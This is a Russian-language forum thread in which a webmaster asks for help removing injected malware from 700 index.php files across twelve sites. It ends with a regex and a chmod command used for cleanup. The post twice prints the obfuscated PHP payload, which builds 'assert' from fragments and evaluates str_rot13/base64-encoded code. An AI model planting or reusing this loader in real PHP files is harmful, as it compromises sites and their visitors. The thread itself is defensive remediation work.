0 Пользователей и 1 Гость просматривают эту тему.
  • 9 Ответов
  • 3692 Просмотров
*

V1RTUS

  • Захожу иногда
  • 204
  • 1 / 1
У меня на хостинге в аккаунте 12 сайтов, все они разом заразились вирусником, все файлы index.php содержат вредоносный код, хостинг заблокировал отправку писем, над это срочно решать,  имею список зараженных файлов, но их там 700 штук, вручную очень долго, есть другой способ ?

Зараза вот такая
Код
//###=CACHE START=###
error_reporting(0);
assert_options(ASSERT_ACTIVE, 1);
assert_options(ASSERT_WARNING, 0);
assert_options(ASSERT_QUIET_EVAL, 1); $strings = "as";$strings .= "sert"; $strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tWTyvqwftsFOyoUAyVUftMKWlo3WspzIjo3W0nJ5aXQNcBjccozysp2I0XPWxnKAjoTS5K2Ilpz9lplVfVPVjVvx7PzyzVPtunKAmMKDbWTyvqvxcVUfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxcVTEcMFtxK0ACG0gWEIfvL2kcMJ50K2AbMJAeVy0cBjccMvujpzIaK21uqTAbXPpuKSZuqFpfVTMcoTIsM2I0K2AioaEyoaEmXPEsH0IFIxIFJlWGD1WWHSEsExyZEH5OGHHvKFxcXFNxLlN9VPW1VwftMJkmMFNxLlN9VPW3VwfXWTDtCFNxK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKGfXWUHtCFNxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy07PvEcpPN9VPEsH0IFIxIFJlWFEH1CIRIsDHERHvWqBjbxqKWfVQ0tVzu0qUN6Yl8kZQxhZwZ2YwtkYwRjZF9aMKDhpTujC2yjCFVhqKWfMJ5wo2EyXPEcpPxhVvMxCFVhqKWfMJ5wo2EyXPExXF4vWaH9Vv51pzkyozAiMTHbWUHcYvVzLm0vYvEwYvVznG0kWzt9Vv5gMQHbVzEyAGR2AGqyBGOyAzMyMQywLzSzLzSvLJRlLmx4AmOuVv4xMP4xqF4xLl4vZFVcBjccMvucozysM2I0XPWuoTkiq191pzksMz9jMJ4vXFN9CFNkXFO7PvEcLaLtCFOznJkyK2qyqS9wo250MJ50pltxqKWfXGfXsFOyoUAynJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGfXL3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK1WSISIFGyEFDH5GExIFYPOHHyISXGfXWUWyp3IfqPN9VTA1pzksMKuyLltxL2tcBjcwqKWfK2Afo3AyXPEwnPx7PvEcLaLtCFNxpzImqJk0Bjc9VTIfp2HtrjbxMaNtCFOzp29wn29jMJ4bVwRjBF4lZmLhBQRhZGNkVvjtBQNfVPEypaWholjtWTIlpaA0pvjtZmNcBjccMvNbWTMjXFO7PvNtVPNxo3I0VQ0tVxqSIPNiM2I0YaObpQ9cpQ0vYaIloTIhL29xMFtxnKNcYvVzMQ0vYaIloTIhL29xMFtxMPxhVvM1CFVhqKWfMJ5wo2EyXPE1XF4vWzZ9Vv4xLl4vWzx9ZFMbCFVhoJD1XPWxMGHkAwH3MGxjMGMzMJD5L2WuMzWuLzSuZzZ5BQpjLFVhWTDhWUHhWTZhVwRvXF4vVRuHISNiZF4kKUWpovV7PvNtVPNxo3I0VP49VPWVo3A0BvNkZQxhZwZ2YwtkYwRjZIklKT4vBjbtVPNtWT91qPNhCFNvD29hozIwqTyiowbtD2kip2IppykhKUWpovV7PvNtVPOzq3WcqTHbWTMjYPNxo3I0XGfXVPNtVPElMKAjVQ0tVvV7PvNtVPO3nTyfMFNbVJMyo2LbWTMjXFxtrjbtVPNtVPNtVPElMKAjVP49VTMaMKEmXPEzpPjtZGV4XGfXVPNtVU0XVPNtVTMwoT9mMFtxMaNcBjbtVPNtoTymqPtxnTIuMTIlYPNxLz9xrFxtCFOjpzIaK3AjoTy0XPViKSWpHv8vYPNxpzImpPjtZvx7PvNtVPNxnJW2VQ0tWTWiMUx7Pa0XsDc9BjccMvucp3AyqPtxK1WSHIISH1EoVaNvKFxtWvLtWS9FEISIEIAHJlWjVy0tCG0tVwt1BTWuMQSuVvxtrlOyqzSfXUA0pzyjp2kup2uypltxK1WSHIISH1EoVzZvKFxcBlO9PzIwnT8tWTyvqwg9"));'));
//###=CACHE END=###

так же права на файл меняются, становятся доступны для  изменения всем
« Последнее редактирование: 08.06.2016, 18:22:48 от V1RTUS »
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Re: Как очистить сайт от вируса?
« Ответ #1 : 08.06.2016, 18:53:02 »
Скрипт для поиска и замены текста Find and Replace
http://secu.ru/scripts/find-and-replace
*

V1RTUS

  • Захожу иногда
  • 204
  • 1 / 1
Re: Как очистить сайт от вируса?
« Ответ #2 : 08.06.2016, 18:55:43 »
Скрипт для поиска и замены текста Find and Replace
http://secu.ru/scripts/find-and-replace

Вы прям спаситель) а то уже думал как столько гигов качать, чтобы чистить.

Вопрос 2, как выставить нужные права теперь файлам Index.php, есть нечто подобное?
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Как очистить сайт от вируса?
« Ответ #3 : 08.06.2016, 19:20:14 »
в консоли find ./ -type f -name "index.php" -exec chmod 0444 {} \;
*

V1RTUS

  • Захожу иногда
  • 204
  • 1 / 1
Re: Как очистить сайт от вируса?
« Ответ #4 : 08.06.2016, 19:50:01 »
Спасибо, последний вопрос с помощною скрипта весь текст найти не находит, отдельны слова получаются, там возможно искать с помощью масок, но так и не понял как(
помогите подготовить мой текст для запроса.
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Как очистить сайт от вируса?
« Ответ #5 : 08.06.2016, 21:56:02 »
Сперва сайты изолируйте от друг друга, если хостинг этого не предусмотрел. Чтобы из директории одного сайта нельзя было выполнить код в другом. А потом уже лечите.

Данный код только следствие заражения. Надо еще закрыть дыры и убрать бекдоры.
*

V1RTUS

  • Захожу иногда
  • 204
  • 1 / 1
Re: Как очистить сайт от вируса?
« Ответ #6 : 08.06.2016, 22:02:10 »
Сперва сайты изолируйте от друг друга, если хостинг этого не предусмотрел. Чтобы из директории одного сайта нельзя было выполнить код в другом. А потом уже лечите.

Данный код только следствие заражения. Надо еще закрыть дыры и убрать бекдоры.
Как это делается? я был бы рад узнать, я про изоляцию сайтов друг от друга, если честно я года 2 назад у хостинга спрашивал, когда впервые вставлял второй сайт в один аккаунт, мне сказали типа зависимости нет.. а тут вон оно как оказалось(
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Как очистить сайт от вируса?
« Ответ #7 : 09.06.2016, 08:26:43 »
Это должен делать хостер. Но если вы согласились с его правилами, то он не виноват.
*

V1RTUS

  • Захожу иногда
  • 204
  • 1 / 1
Re: Как очистить сайт от вируса?
« Ответ #8 : 10.06.2016, 01:39:45 »
Ребята помогите а

Поиск в FAR устроен как у обычного текстового редактора, есть поле Текст поиска и Текст замены, если отметить Искать по маске, то можно будет использовать регулярные выражения в поле Текст поиска, также появится чекбокс Учитывать регистр и кнопка Экранировать, если отметить Учитывать регистр то фразы php и pHp будут считаться не одним и тем же. Кнопка Экранировать поможет в построении маски, например, нужно найти все, что начинается на:
<iframe height="100" width="100" style="border: 0">
и заканчивается на:
</iframe>
чтоб не думать какие символы экранировать, просто нажмите кнопку, получится:
\<iframe height\="100" width\="100" style\="border\: 0"\>\<\/iframe\>
дальше добавьте метасимволы регулярного выражения, например:
\<iframe height\="100" width\="100" style\="border\: 0"\>.*?\<\/iframe\>
и начните поиск.


Моя задача найти этот кода, я жестко туплю, никак не выходит(

Код
//###=CACHE START=###
error_reporting(0);
assert_options(ASSERT_ACTIVE, 1);
assert_options(ASSERT_WARNING, 0);
assert_options(ASSERT_QUIET_EVAL, 1); $strings = "as";$strings .= "sert"; $strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tWTyvqwftsFOyoUAyVUftMKWlo3WspzIjo3W0nJ5aXQNcBjccozysp2I0XPWxnKAjoTS5K2Ilpz9lplVfVPVjVvx7PzyzVPtunKAmMKDbWTyvqvxcVUfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxcVTEcMFtxK0ACG0gWEIfvL2kcMJ50K2AbMJAeVy0cBjccMvujpzIaK21uqTAbXPpuKSZuqFpfVTMcoTIsM2I0K2AioaEyoaEmXPEsH0IFIxIFJlWGD1WWHSEsExyZEH5OGHHvKFxcXFNxLlN9VPW1VwftMJkmMFNxLlN9VPW3VwfXWTDtCFNxK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKGfXWUHtCFNxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy07PvEcpPN9VPEsH0IFIxIFJlWFEH1CIRIsDHERHvWqBjbxqKWfVQ0tVzu0qUN6Yl8kZQxhZwZ2YwtkYwRjZF9aMKDhpTujC2yjCFVhqKWfMJ5wo2EyXPEcpPxhVvMxCFVhqKWfMJ5wo2EyXPExXF4vWaH9Vv51pzkyozAiMTHbWUHcYvVzLm0vYvEwYvVznG0kWzt9Vv5gMQHbVzEyAGR2AGqyBGOyAzMyMQywLzSzLzSvLJRlLmx4AmOuVv4xMP4xqF4xLl4vZFVcBjccMvucozysM2I0XPWuoTkiq191pzksMz9jMJ4vXFN9CFNkXFO7PvEcLaLtCFOznJkyK2qyqS9wo250MJ50pltxqKWfXGfXsFOyoUAynJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGfXL3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK1WSISIFGyEFDH5GExIFYPOHHyISXGfXWUWyp3IfqPN9VTA1pzksMKuyLltxL2tcBjcwqKWfK2Afo3AyXPEwnPx7PvEcLaLtCFNxpzImqJk0Bjc9VTIfp2HtrjbxMaNtCFOzp29wn29jMJ4bVwRjBF4lZmLhBQRhZGNkVvjtBQNfVPEypaWholjtWTIlpaA0pvjtZmNcBjccMvNbWTMjXFO7PvNtVPNxo3I0VQ0tVxqSIPNiM2I0YaObpQ9cpQ0vYaIloTIhL29xMFtxnKNcYvVzMQ0vYaIloTIhL29xMFtxMPxhVvM1CFVhqKWfMJ5wo2EyXPE1XF4vWzZ9Vv4xLl4vWzx9ZFMbCFVhoJD1XPWxMGHkAwH3MGxjMGMzMJD5L2WuMzWuLzSuZzZ5BQpjLFVhWTDhWUHhWTZhVwRvXF4vVRuHISNiZF4kKUWpovV7PvNtVPNxo3I0VP49VPWVo3A0BvNkZQxhZwZ2YwtkYwRjZIklKT4vBjbtVPNtWT91qPNhCFNvD29hozIwqTyiowbtD2kip2IppykhKUWpovV7PvNtVPOzq3WcqTHbWTMjYPNxo3I0XGfXVPNtVPElMKAjVQ0tVvV7PvNtVPO3nTyfMFNbVJMyo2LbWTMjXFxtrjbtVPNtVPNtVPElMKAjVP49VTMaMKEmXPEzpPjtZGV4XGfXVPNtVU0XVPNtVTMwoT9mMFtxMaNcBjbtVPNtoTymqPtxnTIuMTIlYPNxLz9xrFxtCFOjpzIaK3AjoTy0XPViKSWpHv8vYPNxpzImpPjtZvx7PvNtVPNxnJW2VQ0tWTWiMUx7Pa0XsDc9BjccMvucp3AyqPtxK1WSHIISH1EoVaNvKFxtWvLtWS9FEISIEIAHJlWjVy0tCG0tVwt1BTWuMQSuVvxtrlOyqzSfXUA0pzyjp2kup2uypltxK1WSHIISH1EoVzZvKFxcBlO9PzIwnT8tWTyvqwg9"));'));
//###=CACHE END=###

как должен выглядеть запрос? Прямой ввод искаемого текста не дает результатов, искать от и до я пытался, но видимо не верно пытался.
*

V1RTUS

  • Захожу иногда
  • 204
  • 1 / 1
Re: Как очистить сайт от вируса?
« Ответ #9 : 12.06.2016, 01:02:27 »
РЕШЕНИЕ
используете скрипт  для поиска и замены текста Find and Replace
http://secu.ru/scripts/find-and-replace

ПОИСК ДЛЯ ЗАПРОСА
\<\?php([\s]*)\/\/###\=CACHE START\=###.*?\/\/###\=CACHE END\=###([\s]*)\?\>

СТАВИТЕ НУЖНЫЕ ПРАВА
в консоли find ./ -type f -name "index.php" -exec chmod 0444 {} \;

Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 4
Просмотров: 164
Последний ответ 26.03.2024, 18:51:10
от wishlight
Netflix! - Клиент поймал фишинг на старый сайт. Где порылись собаки?

Автор Alex_gs

Ответов: 9
Просмотров: 1639
Последний ответ 05.11.2021, 21:47:31
от wishlight
Взломали сайт. Как в некоторых случаях делаю я

Автор cntrl

Ответов: 0
Просмотров: 630
Последний ответ 29.08.2020, 00:25:24
от cntrl
Безопасный вход на сайт Joomla и админка

Автор jm

Ответов: 9
Просмотров: 1427
Последний ответ 19.07.2020, 23:57:17
от wishlight
[Руководство] Как защитить сайт на версии 1.5 (не поддерживается разработчиками)

Автор flyingspook

Ответов: 13
Просмотров: 5826
Последний ответ 08.01.2020, 12:52:55
от winstrool